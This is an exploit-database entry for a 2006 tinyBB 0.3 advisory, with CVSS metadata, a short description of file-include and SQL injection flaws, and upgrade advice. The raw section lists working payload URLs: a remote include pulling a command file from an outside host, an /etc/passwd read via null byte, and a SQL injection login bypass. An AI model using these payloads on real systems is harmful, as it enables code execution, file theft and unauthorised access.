header-logo
Suggest Exploit
vendor:
tinyBB
by:
nukedx
7.5
CVSS
HIGH
Multiple Remote Vulnerabilities
94, 98, 89
CWE
Product Name: tinyBB
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:tinybb:tinybb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

tinyBB <= 0.3 Multiple Remote Vulnerabilities

This exploits works on tinyBB <= 0.3. It includes a Remote File Include vulnerability, a Local File Include vulnerability, and a SQL injection vulnerability. The Remote File Include vulnerability allows an attacker to include a remote file on the vulnerable server. The Local File Include vulnerability allows an attacker to include a local file on the vulnerable server. The SQL injection vulnerability allows an attacker to inject malicious SQL code into the vulnerable server.

Mitigation:

The best way to mitigate these vulnerabilities is to upgrade to the latest version of tinyBB. Additionally, it is recommended to use a web application firewall to protect against these types of attacks.
Source

Exploit-DB raw data:

tinyBB <= 0.3 Multiple Remote Vulnerabilities
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on tinyBB <= 0.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]

Navigation

Suggest Exploit

Services By CQR